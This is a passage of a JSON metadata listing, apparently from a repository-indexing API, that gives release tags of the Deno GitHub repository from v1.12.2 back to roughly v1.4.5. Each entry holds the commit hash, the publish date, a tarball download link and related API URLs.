tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/deno